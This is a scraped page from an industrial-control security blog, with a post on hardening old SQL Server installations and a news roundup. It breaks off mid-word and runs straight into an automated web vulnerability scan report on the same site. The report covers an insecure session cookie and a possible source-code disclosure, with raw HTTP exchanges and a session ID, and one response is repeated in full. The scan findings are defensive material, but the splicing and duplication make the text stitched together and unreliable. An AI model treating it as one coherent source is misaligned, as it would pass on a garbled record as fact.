<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Digital Bond's SCADA Security Portal</title>
<link rel="shortcut icon" href="http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="http://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Feed" href="http://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Comments Feed" href="http://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='blackbirdpie-css-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/twitter-blackbird-pie/css/blackbirdpie.css?ver=20110404' type='text/css' media='all' /><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/twitter-blackbird-pie/js/blackbirdpie.js?ver=20110404'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond's SCADA Security Portal' href='http://www.digitalbond.com/' /><link rel='shortlink' href='http://wp.me/1lryr' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,382] --><meta name="description" content="A site for SCADA Security and Control System IT information. The latest on SCADA, DCS and ICS Security including SCADA Security Consulting and SCADA Security Research." /><meta name="keywords" content="SCADA Security, ICS Security, DCS Security, SCADA IDS, SCADA Vulnerability, SCADA Firewall, Digital Bond, Bandolier, Quickdraw, Portaledge, SCADA Honeynet, Critical-Intelligence, Control System Security, SCADA Security Consulting" /><link rel="canonical" href="http://www.digitalbond.com/" /><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('http://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="http://www.digitalbond.com/?bfa_ata_file=js"></script>
<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="home blog">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="coltwo" />
<col class="colthree" /></colgroup>
<tr>
<!-- Header -->
<td id="header" colspan="2">
<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item current_page_item"><a href="http://www.digitalbond.com/" title="Digital Bond's SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1"> </div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="http://www.digitalbond.com/"><img class="logo" src="http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond's SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=10" title="Emerging Threats Pro"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/SqJJy8_ad_april_2011_42K_v2-2.jpg" alt="Emerging Threats Pro" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1"> </div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What’s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="http://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>
</td>
<!-- / Header -->
</tr>
<!-- Main Body -->
<tr id="bodyrow">
<!-- Main Column -->
<td id="middle">
<div class="post-9778 post type-post status-publish format-standard hentry category-control-system-it category-ics-security-technologies tag-database-security tag-security-hardening tag-sql-server odd" id="post-9778">
<div class="post-headline"> <h2> <a href="http://www.digitalbond.com/2011/04/19/sql2000-server-security/" rel="bookmark" title="Permanent Link to SQL2000 Server Security">SQL2000 Server Security</a></h2>
</div>
<div class="post-byline">Marco Cajina</div>
<div class="post-bodycopy clearfix"><div class="twitter_button" style="float: right; margin-left: 10px;"><iframe src="http://platform.twitter.com/widgets/tweet_button.html?url=http%3A%2F%2Fwww.digitalbond.com%2F2011%2F04%2F19%2Fsql2000-server-security%2F&count=horizontal&related=digitalbond:&via=digitalbond&lang=en" height="20" width="110" frameborder="0" scrolling="no" allowtransparency="true"></iframe></div><p><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/04/basics.jpg"><img class="alignleft size-full wp-image-9786" title="basics" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/04/basics.jpg" alt="" width="240" height="185" /></a></p><p style="padding-top: 30px;">First, how many of you can actually say that you can be 100% certain that you know the exact number of SQL servers in your environment? Also, how many of you are certain that they are locked down? Were you aware that there is a stored procedure that runs commands as the Local System account and that it is enabled by default on SQL2000 or earlier versions of SQL?</p><p>The topic of security hardening typically covers lowering the footprint of the operating system and control system software to minimize risk exposure; however, it should also cover lowering the database footprint. Here is a general guide for hardening your SQL2000 or earlier servers.</p><ul><li>Generate a password for the built-in SA account.</li><li>Create and use a service account to run the SQL Windows services to minimize the impact of a compromised database server or instance.</li><li>Revoke the BuiltIn\Administrators groups access sysadmin access to the database server. You can then create new logins for any Windows accounts that need access to the database (i.e. Service Accounts, DBAs, etc.).</li><li>Revoke access to the xp_cmdshell and other extended stored procedures. You can create a new role and only grant that role access to execute the procedures.</li><li>Remove the named pipes connectivity and use TCP/IP connections only.</li></ul><p> <a href="http://www.digitalbond.com/2011/04/19/sql2000-server-security/#more-9778" class="more-link">Read More</a></p></div>
<div class="post-footer">19 April 2011 | <a href="http://www.digitalbond.com/2011/04/19/sql2000-server-security/#respond" class="comments-link" title="Comment on SQL2000 Server Security">Leave a comment</a></div>
</div><!-- / Post -->
<div class="post-9773 post type-post status-publish format-standard hentry category-1 tag-critical-intelligence tag-ics-security-calendar even" id="post-9773">
<div class="post-headline"> <h2> <a href="http://www.digitalbond.com/2011/04/15/friday-news-and-notes-130/" rel="bookmark" title="Permanent Link to Friday News and Notes">Friday News and Notes</a></h2>
</div>
<div class="post-byline">Dale G Peterson</div>
<div class="post-bodycopy clearfix"><div class="twitter_button" style="float: right; margin-left: 10px;"><iframe src="http://platform.twitter.com/widgets/tweet_button.html?url=http%3A%2F%2Fwww.digitalbond.com%2F2011%2F04%2F15%2Ffriday-news-and-notes-130%2F&count=horizontal&related=digitalbond:&via=digitalbond&lang=en" height="20" width="110" frameborder="0" scrolling="no" allowtransparency="true"></iframe></div><p><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/04/fork.jpg"><img class="alignleft size-full wp-image-9774" title="fork" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/04/fork.jpg" alt="SCADA Security" width="180" height="240" /></a></p><p style="padding-top: 30px;">A record breaking Microsoft Patch Tuesday this week with at least 64 security vulnerabilities fixed. <a href="http://krebsonsecurity.com/2011/04/microsoft-issues-monster-patch-update/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+KrebsOnSecurity+%28Krebs+on+Security%29">Krebs highlights one in particular</a>. “Attackers could exploit the flaw addressed by MS11-020 by sending a single, specially crafted evil data packet to a targeted system. This is the type of flaw that should concern any network administrator, because it has high potential to be used to power an automated computer worm.”</p><p>Another week and two more ICS vulnerabilites. This time in <a href="http://www.us-cert.gov/control_systems/pdf/ICSA-11-094-01.pdf">Wonderware’s InBatch Client</a> and <a href="http://www.us-cert.gov/control_systems/pdf/ICSA-11-103-01.pdf">Honeywell’s ScanServer</a>. Wonderware is a very popular and is often used to modernize the HMI’s in older control systems and also as the complete SCADA solution for smaller installations. Honewell’s ScanServer is used in building automation, especially HVAC. NCCIC also released <a href="http://www.us-cert.gov/control_systems/pdf/NCCIC_Phishing_Advisory.pdf">a bulletin on spear phishing</a>, perhaps because both of the vulnerabilities would likely require some amount of social engineering.</p><h3>Tweet of the Week</h3><!-- tweet id : 58523720687435776 --> <style type='text/css'> #bbpBox_58523720687435776 a { text-decoration:none; color:#0084B4; } #bbpBox_58523720687435776 a:hover { text-decoration:underline; } </style> <div id='bbpBox_58523720687435776' class='bbpBox' style='padding:20px; margin:5px 0; background-color:#C0DEED; background-image:url(http://a3.twimg.com/a/1302111227/images/themes/theme1/bg.png); background-repeat:no-repeat'> <div style='background:#fff; padding:10px; margin:0; min-height:48px; color:#333333; -moz-border-radius:5px; -webkit-border-radius:5px;'> <span style='width:100%; font-size:18px; line-height:22px;'> What would you do if Law Enforcement wanted to seize a CCA for evidence purposes? <a href="http://twitter.com/search?q=%23IRPExercise" title="#IRPExercise">#IRPExercise</a> </span> <div class='bbp-actions' style='font-size:12px; width:100%; padding:5px 0; margin:0 0 10px 0; border-bottom:1px solid #e6e6e6;'> <img align='middle' src='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/twitter-blackbird-pie//images/bird.png' /> <a title='tweeted on 14 Apr 2011 08:35' href='http://twitter.com/#!/mtoecker/status/58523720687435776' target='_blank'>14 Apr 2011 08:35</a> via web <a href='https://twitter.com/intent/tweet?in_reply_to=58523720687435776' class='bbp-action bbp-reply-action' title='Reply'> <span><em style='margin-left: 1em;'></em><strong>Reply</strong></span> </a> <a href='https://twitter.com/intent/retweet?tweet_id=58523720687435776' class='bbp-action bbp-retweet-action' title='Retweet'> <span><em style='margin-left: 1em;'></em><strong>Retw..
Cookie Not Marked As Secure
Cookie Not Marked As Secure
1
TOTAL
IMPORTANT
CONFIRMED
1
A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (Man in the middle) attack.
Impact
This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.
Actions to Take
- See the remedy for solution.
- Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))
Remedy
Mark all cookies used within the application as secure.
Required Skills for Successful Exploitation
To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.
|
- /wp-login.php
/wp-login.php CONFIRMED |
Identified Cookie
PHPSESSID
Request
GET /wp-login.php?action=register HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 19:55:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Set-Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; path=/,wordpress_test_cookie=WP+Cookie+check; path=/,wordpress_test_cookie=WP+Cookie+check; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 19 Apr 2011 19:55:55 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 2361
X-Type: backend
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head> <title>Digital Bond's SCADA Security Portal › Registration Form</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel='stylesheet' id='login-css' href='https://www.digitalbond.com/wp-admin/css/login.css?ver=20110121' type='text/css' media='all' /><link rel='stylesheet' id='colors-fresh-css' href='https://www.digitalbond.com/wp-admin/css/colors-fresh.css?ver=20110121' type='text/css' media='all' /><script type='text/javascript' src='https://www.digitalbond.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://www.digitalbond.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel='stylesheet' id='cimy_uef_register-css' href='https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/css/cimy_uef_register.css?ver=3.1.1' type='text/css' media='all' /> <style type="text/css">
#login h1 a {
background: url(http://www.digitalbond.com/wp-content/Cimy_User_Extra_Fields/digitalbond_logo_final_328.png) no-repeat top center;
background-position: center top;
width: 328px;
height: 165px;
text-indent: -9999px;
overflow: hidden;
padding-bottom: 15px;
display: block;
}
</style>
<meta name='robots' content='noindex,nofollow' /></head><body class="login"><div id="login"><h1><a href="http://wordpress.org/" title="Powered by WordPress">Digital Bond's SCADA Security Portal</a></h1><p class="message register">Register For This Site</p><form name="registerform" id="registerform" action="https://www.digitalbond.com/wp-login.php?action=register" method="post"> <p> <label>Username<br /> <input type="text" name="user_login" id="user_login" class="input" value="" size="20" tabindex="10" /></label> </p> <p> <label>E-mail<br /> <input type="text" name="user_email" id="user_email" class="input" value="" size="25" tabindex="20" /></label> </p><!-- Start code from Cimy User Extra Fields 2.0.3 Copyright (c) 2006-2011 Marco Cimmino http://www.marcocimmino.net/cimy-wordpress-plugins/cimy-user-extra-fields/--> <input type="hidden" name="cimy_post" value="1" /> <p id="cimy_uef_wp_p_field_1"> <label for="cimy_uef_wp_1">First name</label><input type="text" name="cimy_uef_wp_FIRSTNAME" id="cimy_uef_wp_1" class="cimy_uef_input_27" value="" maxlength="20" tabindex="21" /> </p> <p id="cimy_uef_wp_p_field_2"> <label for="cimy_uef_wp_2">Last name</label><input type="text" name="cimy_uef_wp_LASTNAME" id="cimy_uef_wp_2" class="cimy_uef_input_27" value="" maxlength="25" tabindex="22" /> </p> <p id="cimy_uef_wp_p_field_3"> <label for="cimy_uef_wp_3">Password</label><input type="password" name="cimy_uef_wp_PASSWORD" id="cimy_uef_wp_3" class="cimy_uef_input_27" value="" maxlength="16" tabindex="23" /> </p> <p id="cimy_uef_wp_p_field_4"> <label for="cimy_uef_wp_4">Password confirmation</label><input type="password" name="cimy_uef_wp_PASSWORD2" id="cimy_uef_wp_4" class="cimy_uef_input_27" value="" maxlength="16" tabindex="24" /> </p> <h2>Password_Tips</h2> <p id="cimy_uef_p_desc_7" class="desc"><br />Use your weak password on this site. Do not use one of your strong, important passwords because it will be sent in an email.
Registration is free of charge and you will not purchase anything with this account. </p> <p id="cimy_uef_p_field_7"> <input type="checkbox" name="cimy_uef_TIP" id="cimy_uef_7" class="cimy_uef_checkbox" value="1" tabindex="25" /><label class="cimy_uef_label_checkbox" for="cimy_uef_7"> </label><br /> </p> <p id="cimy_uef_p_field_1"> <label for="cimy_uef_1">Enter your company's name</label><input type="text" name="cimy_uef_COMPANY" id="cimy_uef_1" class="cimy_uef_input_27" value="" maxlength="63" tabindex="26" /> </p> <p id="cimy_uef_p_field_5"> <label for="cimy_uef_5">Enter your industry sector</label><input type="text" name="cimy_uef_SECTOR" id="cimy_uef_5" class="cimy_uef_input_27" value="" maxlength="63" tabindex="27" /> </p> <p id="cimy_uef_p_field_6"> <label for="cimy_uef_6">What country are you in?</label><input type="text" name="cimy_uef_COUNTRY" id="cimy_uef_6" class="cimy_uef_input_27" value="" maxlength="25" tabindex="28" /> </p> <div style="width: 278px; float: left; height: 80px; vertical-align: text-top;"> <img id="captcha" align="left" style="padding-right: 5px; border: 0" src="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_show_captcha.php" alt="CAPTCHA Image" /> <object type="application/x-shockwave-flash" data="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.swf?audio=https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.php&bgColor1=#fff&bgColor2=#fff&iconColor=#777&borderWidth=1&borderColor=#000" height="19" width="19"><param name="movie" value="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.swf?audio=https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.php&bgColor1=#fff&bgColor2=#fff&iconColor=#777&borderWidth=1&borderColor=#000" /></object> <br /><br /><br /><br /> <a align="right" tabindex="29" style="border-style: none" href="#" onclick="document.getElementById('captcha').src = 'https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_show_captcha.php?' + Math.random(); return false"><img src="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/images/refresh.gif" alt="Change image" border="0" onclick="this.blur()" align="bottom" /></a> </div> <div style="width: 278px; float: left; height: 50px; vertical-align: bottom; padding: 5px;"> Insert the code: <input type="text" name="securimage_response_field" size="10" maxlength="6" tabindex="30" /> </div><!-- End of code from Cimy User Extra Fields--> <p id="reg_passmail">A password will be e-mailed to you.</p> <br class="clear" /> <input type="hidden" name="redirect_to" value="" /> <p class="submit"><input type="submit" name="wp-submit" id="wp-submit" class="button-primary" value="Register" tabindex="100" /></p></form><p id="nav"><a href="https://www.digitalbond.com/wp-login.php">Log in</a> |<a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="Password Lost and Found">Lost your password?</a></p></div><script type="text/javascript">try{document.getElementById('user_login').focus();}catch(e){}if(typeof wpOnload=='function')wpOnload();</script><p id="backtoblog"><a href="https://www.digitalbond.com/" title="Are you lost?">← Back to Digital Bond's SCADA Security Portal</a></p></body></html>
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 19:55:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Set-Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; path=/,wordpress_test_cookie=WP+Cookie+check; path=/,wordpress_test_cookie=WP+Cookie+check; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 19 Apr 2011 19:55:55 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 2361
X-Type: backend
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head> <title>Digital Bond's SCADA Security Portal › Registration Form</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel='stylesheet' id='login-css' href='https://www.digitalbond.com/wp-admin/css/login.css?ver=20110121' type='text/css' media='all' /><link rel='stylesheet' id='colors-fresh-css' href='https://www.digitalbond.com/wp-admin/css/colors-fresh.css?ver=20110121' type='text/css' media='all' /><script type='text/javascript' src='https://www.digitalbond.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://www.digitalbond.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel='stylesheet' id='cimy_uef_register-css' href='https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/css/cimy_uef_register.css?ver=3.1.1' type='text/css' media='all' /> <style type="text/css">
#login h1 a {
background: url(http://www.digitalbond.com/wp-content/Cimy_User_Extra_Fields/digitalbond_logo_final_328.png) no-repeat top center;
background-position: center top;
width: 328px;
height: 165px;
text-indent: -9999px;
overflow: hidden;
padding-bottom: 15px;
display: block;
}
</style>
<meta name='robots' content='noindex,nofollow' /></head><body class="login"><div id="login"><h1><a href="http://wordpress.org/" title="Powered by WordPress">Digital Bond's SCADA Security Portal</a></h1><p class="message register">Register For This Site</p><form name="registerform" id="registerform" action="https://www.digitalbond.com/wp-login.php?action=register" method="post"> <p> <label>Username<br /> <input type="text" name="user_login" id="user_login" class="input" value="" size="20" tabindex="10" /></label> </p> <p> <label>E-mail<br /> <input type="text" name="user_email" id="user_email" class="input" value="" size="25" tabindex="20" /></label> </p><!-- Start code from Cimy User Extra Fields 2.0.3 Copyright (c) 2006-2011 Marco Cimmino http://www.marcocimmino.net/cimy-wordpress-plugins/cimy-user-extra-fields/--> <input type="hidden" name="cimy_post" value="1" /> <p id="cimy_uef_wp_p_field_1"> <label for="cimy_uef_wp_1">First name</label><input type="text" name="cimy_uef_wp_FIRSTNAME" id="cimy_uef_wp_1" class="cimy_uef_input_27" value="" maxlength="20" tabindex="21" /> </p> <p id="cimy_uef_wp_p_field_2"> <label for="cimy_uef_wp_2">Last name</label><input type="text" name="cimy_uef_wp_LASTNAME" id="cimy_uef_wp_2" class="cimy_uef_input_27" value="" maxlength="25" tabindex="22" /> </p> <p id="cimy_uef_wp_p_field_3"> <label for="cimy_uef_wp_3">Password</label><input type="password" name="cimy_uef_wp_PASSWORD" id="cimy_uef_wp_3" class="cimy_uef_input_27" value="" maxlength="16" tabindex="23" /> </p> <p id="cimy_uef_wp_p_field_4"> <label for="cimy_uef_wp_4">Password confirmation</label><input type="password" name="cimy_uef_wp_PASSWORD2" id="cimy_uef_wp_4" class="cimy_uef_input_27" value="" maxlength="16" tabindex="24" /> </p> <h2>Password_Tips</h2> <p id="cimy_uef_p_desc_7" class="desc"><br />Use your weak password on this site. Do not use one of your strong, important passwords because it will be sent in an email.
Registration is free of charge and you will not purchase anything with this account. </p> <p id="cimy_uef_p_field_7"> <input type="checkbox" name="cimy_uef_TIP" id="cimy_uef_7" class="cimy_uef_checkbox" value="1" tabindex="25" /><label class="cimy_uef_label_checkbox" for="cimy_uef_7"> </label><br /> </p> <p id="cimy_uef_p_field_1"> <label for="cimy_uef_1">Enter your company's name</label><input type="text" name="cimy_uef_COMPANY" id="cimy_uef_1" class="cimy_uef_input_27" value="" maxlength="63" tabindex="26" /> </p> <p id="cimy_uef_p_field_5"> <label for="cimy_uef_5">Enter your industry sector</label><input type="text" name="cimy_uef_SECTOR" id="cimy_uef_5" class="cimy_uef_input_27" value="" maxlength="63" tabindex="27" /> </p> <p id="cimy_uef_p_field_6"> <label for="cimy_uef_6">What country are you in?</label><input type="text" name="cimy_uef_COUNTRY" id="cimy_uef_6" class="cimy_uef_input_27" value="" maxlength="25" tabindex="28" /> </p> <div style="width: 278px; float: left; height: 80px; vertical-align: text-top;"> <img id="captcha" align="left" style="padding-right: 5px; border: 0" src="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_show_captcha.php" alt="CAPTCHA Image" /> <object type="application/x-shockwave-flash" data="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.swf?audio=https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.php&bgColor1=#fff&bgColor2=#fff&iconColor=#777&borderWidth=1&borderColor=#000" height="19" width="19"><param name="movie" value="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.swf?audio=https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.php&bgColor1=#fff&bgColor2=#fff&iconColor=#777&borderWidth=1&borderColor=#000" /></object> <br /><br /><br /><br /> <a align="right" tabindex="29" style="border-style: none" href="#" onclick="document.getElementById('captcha').src = 'https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_show_captcha.php?' + Math.random(); return false"><img src="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/images/refresh.gif" alt="Change image" border="0" onclick="this.blur()" align="bottom" /></a> </div> <div style="width: 278px; float: left; height: 50px; vertical-align: bottom; padding: 5px;"> Insert the code: <input type="text" name="securimage_response_field" size="10" maxlength="6" tabindex="30" /> </div><!-- End of code from Cimy User Extra Fields--> <p id="reg_passmail">A password will be e-mailed to you.</p> <br class="clear" /> <input type="hidden" name="redirect_to" value="" /> <p class="submit"><input type="submit" name="wp-submit" id="wp-submit" class="button-primary" value="Register" tabindex="100" /></p></form><p id="nav"><a href="https://www.digitalbond.com/wp-login.php">Log in</a> |<a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="Password Lost and Found">Lost your password?</a></p></div><script type="text/javascript">try{document.getElementById('user_login').focus();}catch(e){}if(typeof wpOnload=='function')wpOnload();</script><p id="backtoblog"><a href="https://www.digitalbond.com/" title="Are you lost?">← Back to Digital Bond's SCADA Security Portal</a></p></body></html>
[Possible] PHP Source Code Disclosure
[Possible] PHP Source Code Disclosure
1
TOTAL
MEDIUM
Netsparker identified a web page that discloses PHP (server side) source code. An attacker can obtain server side source code of web application, which can contain sensitive data such as database connection strings, usernames and passwords along with the technical and business logic of the application.
Impact
Depending on the source code, database connection strings, username and passwords, internal workings and business logic of application can be revealed. With such information an attacker can mount the following types of attacks:
- Access the database or other data resources. Depending on the privileges of the account obtained from source code, it may be possible to read, update or delete arbitrary data from the database.
- Gain access to password protected administrative mechanisms such as dashboards, management consoles and admin panels, hence gaining full control of the application.
- Develop further attacks by investigating the source code for input validation errors and logic vulnerabilities.
Actions to Take
- Where the file is not required delete it form the server, where such files are required ensure that its permissions prevent users from accessing it via the web server.
- Ensure that the web server security patches are up to date and the latest stable version of the web server software is in use.
- Remove all temporary and backup files from the server.
Required skills for successful exploitation
This is dependent on the information obtained from source code. Uncovering these forms of vulnerabilities does not require high levels of skills. However a highly skilled attacker could leverage this form of vulnerability to obtain account information for databases or administrative panels, ultimately leading to control of the application or even the host the application reside on.
External References
|
- /wp-content/themes/atahualpa/js/DD_roundies.js
/wp-content/themes/atahualpa/js/DD_roundies.js |
Request
GET /wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a HTTP/1.1
Referer: https://www.digitalbond.com/wp-login.php?action=register
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Referer: https://www.digitalbond.com/wp-login.php?action=register
